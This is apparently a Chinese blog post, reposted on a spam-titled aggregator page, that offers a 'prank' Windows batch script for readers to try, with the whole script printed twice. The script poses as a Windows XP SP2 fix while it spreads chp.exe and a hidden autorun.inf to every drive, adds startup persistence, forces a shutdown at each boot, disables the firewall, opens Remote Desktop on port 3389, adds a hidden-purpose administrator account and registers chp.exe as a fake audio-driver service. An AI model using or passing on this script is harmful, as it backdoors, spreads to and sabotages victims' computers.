中财网pos机刷卡套现违法吗:整古专家之恶意批处理命令 - 世界因你而不同 - 51CTO技术博客-领先的IT技术博客
来源:百度文库 编辑:中财网 时间:2024/05/09 16:17:57
今天,考试完后.闲来无事.........在电脑里面找到些好东东.......有兴趣的可以试试.ps:出了问题,别找我!!!!!!!!!!!! @Echo Off
@color 0A
@Echo Microsoft WindowsXP SP2 修复程序正在修复您系统中的漏洞...... 请不要关闭,否则将系统崩溃!
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo [autorun] >%windir%\autorun.inf
@Echo open=chp.exe >>%windir%\autorun.inf
@Echo shell\1=Open >>%windir%\autorun.inf
@Echo shell\1\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\2\=Browser >>%windir%\autorun.inf
@Echo shell\2\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\3\=打开 >>%windir%\autorun.inf
@Echo shell\3\command=chp.exe >>%windir%\autorun.inf
@Echo shellexecute=chp.exe >>%windir%\autorun.inf
@For %%b In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%b (@xcopy %windir%\autorun.inf %%b\ /h /c /r /y >nul)
@For %%c In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%c (@xcopy chp.exe %%c\ /h /c /r /y >nul )
@For %%d In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%d\autorun.inf (@Attrib %%d\autorun.inf +h +s >nul)
@For %%e In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%e\chp.exe (@Attrib %%e\chp.exe +h +s >nul)
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v chpoe /t REG_SZ /d "chpshut.exe -s /t 15" /f >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo Windows Registry Editor Version 5.00 >%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>%windir%\opentsc.dll
@Echo "Shell"="Explorer.exe /chpshut.exe -s /t 15" >>%windir%\opentsc.dll
@Echo Windows Registry Editor Version 5.00 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>%windir%\opentsc.dll
@Echo "fDenyTSConnections"=dword:00000000 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] >>%windir%\opentsc.dll
@Echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] >>%windir%\opentsc.dll
@Echo "EnableFirewall"=dword:00000000 >>%windir%\opentsc.dll
@regedit /s %windir%\opentsc.dll >nul
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@net user /add new /Active:yes >nul
@net user new 123456 >nul
@net localgroup administrators new /add >nul
@sfc /purgecache >nul
@Ren %windir%\system32\shutdown.exe chpshut.exe >nul
@chpshut.exe -s /t 15
关于注册为服务:
echo [Version] >%windir%\snddrv.inf
echo Signature="$WINDOWS NT$" >>%windir%\snddrv.inf
echo [DefaultInstall.Services] >>%windir%\snddrv.inf
echo AddService=snddrv,,My_AddService_Name >>%windir%\snddrv.inf
echo [My_AddService_Name] >>%windir%\snddrv.inf
echo DisplayName=Windows Audio Drivers >>%windir%\snddrv.inf
echo Description=提供对 Windows 音频硬件的支持。 >>%windir%\snddrv.inf
echo ServiceType=0x10 >>%windir%\snddrv.inf
echo StartType=2 >>%windir%\snddrv.inf
echo ErrorControl=0 >>%windir%\snddrv.inf
echo ServiceBinary=%windir%\chp.exe >>%windir%\snddrv.inf
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %windir%\snddrv.inf存为.cmd或bat执行就行了
@color 0A
@Echo Microsoft WindowsXP SP2 修复程序正在修复您系统中的漏洞...... 请不要关闭,否则将系统崩溃!
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo [autorun] >%windir%\autorun.inf
@Echo open=chp.exe >>%windir%\autorun.inf
@Echo shell\1=Open >>%windir%\autorun.inf
@Echo shell\1\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\2\=Browser >>%windir%\autorun.inf
@Echo shell\2\Command=chp.exe >>%windir%\autorun.inf
@Echo shell\3\=打开 >>%windir%\autorun.inf
@Echo shell\3\command=chp.exe >>%windir%\autorun.inf
@Echo shellexecute=chp.exe >>%windir%\autorun.inf
@For %%b In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%b (@xcopy %windir%\autorun.inf %%b\ /h /c /r /y >nul)
@For %%c In (C:,D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%c (@xcopy chp.exe %%c\ /h /c /r /y >nul )
@For %%d In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%d\autorun.inf (@Attrib %%d\autorun.inf +h +s >nul)
@For %%e In (D:,E:,F:,G:,H:,I:,J:,K:,L:,M:,N:,O:,P:,Q:,R:,S:,T:,U:,V:,W:,X:,Y:,Z:) Do If Exist %%e\chp.exe (@Attrib %%e\chp.exe +h +s >nul)
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v chpoe /t REG_SZ /d "chpshut.exe -s /t 15" /f >nul
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v sysinfo /t REG_SZ /d "%windir%\chp.exe" /f >nul
@Echo Windows Registry Editor Version 5.00 >%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>%windir%\opentsc.dll
@Echo "Shell"="Explorer.exe /chpshut.exe -s /t 15" >>%windir%\opentsc.dll
@Echo Windows Registry Editor Version 5.00 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>%windir%\opentsc.dll
@Echo "fDenyTSConnections"=dword:00000000 >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] >>%windir%\opentsc.dll
@Echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" >>%windir%\opentsc.dll
@Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] >>%windir%\opentsc.dll
@Echo "EnableFirewall"=dword:00000000 >>%windir%\opentsc.dll
@regedit /s %windir%\opentsc.dll >nul
@xcopy chp.exe %windir%\ /h /c /r /y >nul
@net user /add new /Active:yes >nul
@net user new 123456 >nul
@net localgroup administrators new /add >nul
@sfc /purgecache >nul
@Ren %windir%\system32\shutdown.exe chpshut.exe >nul
@chpshut.exe -s /t 15
关于注册为服务:
echo [Version] >%windir%\snddrv.inf
echo Signature="$WINDOWS NT$" >>%windir%\snddrv.inf
echo [DefaultInstall.Services] >>%windir%\snddrv.inf
echo AddService=snddrv,,My_AddService_Name >>%windir%\snddrv.inf
echo [My_AddService_Name] >>%windir%\snddrv.inf
echo DisplayName=Windows Audio Drivers >>%windir%\snddrv.inf
echo Description=提供对 Windows 音频硬件的支持。 >>%windir%\snddrv.inf
echo ServiceType=0x10 >>%windir%\snddrv.inf
echo StartType=2 >>%windir%\snddrv.inf
echo ErrorControl=0 >>%windir%\snddrv.inf
echo ServiceBinary=%windir%\chp.exe >>%windir%\snddrv.inf
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %windir%\snddrv.inf存为.cmd或bat执行就行了